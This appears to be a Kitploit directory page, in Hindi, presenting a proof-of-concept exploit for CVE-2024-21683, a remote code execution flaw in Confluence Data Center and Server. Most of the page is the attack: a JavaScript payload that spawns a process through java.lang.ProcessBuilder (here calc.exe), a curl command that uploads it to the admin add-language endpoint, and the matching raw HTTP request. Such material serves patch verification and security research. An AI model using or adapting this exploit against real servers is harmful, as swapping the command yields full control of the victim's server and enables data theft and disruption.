Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server — यह कमजोरी एक हमलावर को एक असुरक्षित Confluence सर्वर पर पूर्ण नियंत्रण प्राप्त करने की अनुमति दे सकती है। इससे हमलावर डेटा चुराने, डेटा संशोधित करने, या सर्वर की उपलब्धता बाधित करने में सक्षम हो सकता है। | Kitploit
उपकरण/GitHubGitHub/absholi7ly/-cve-2024-21683-rce-in-confluence-data-center-and-server
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubabsholi7ly/-cve-2024-21683-rce-in-confluence-data-center-and-server

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

यह कमजोरी एक हमलावर को एक असुरक्षित Confluence सर्वर पर पूर्ण नियंत्रण प्राप्त करने की अनुमति दे सकती है। इससे हमलावर डेटा चुराने, डेटा संशोधित करने, या सर्वर की उपलब्धता बाधित करने में सक्षम हो सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1132 साल पहलेअभी तक समीक्षित नहीं

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

यह कमजोरी एक हमलावर को कमजोर Confluence सर्वर पर पूर्ण नियंत्रण प्राप्त करने की अनुमति दे सकती है। इससे हमलावर डेटा चुरा सकता है, डेटा संशोधित कर सकता है, या सर्वर की उपलब्धता को बाधित कर सकता है।

Poc

  • एक JavaScript फ़ाइल बनाएँ और उसे एक नाम दें (exploit.js) तथा निम्नलिखित पंक्ति डालें
root@kitploit:~
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

और कमांड के माध्यम से नई भाषा अपलोड करने का अनुरोध भेजें

root@kitploit:~
curl -X POST http://[IP_address]:8090/admin/plugins/newcode/addlanguage.action -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08" -F "atl_token=[atl_token]" -F "[email protected];filename=exploit.js" -F "newLanguageName=RCE"

या यह अनुरोध

root@kitploit:~
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close

------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"

 [ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"

RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--

यदि कमजोरी का शोषण सफल होता है, तो आपके उपकरण पर कैलकुलेटर खुल जाता है।

टूल डाउनलोड करें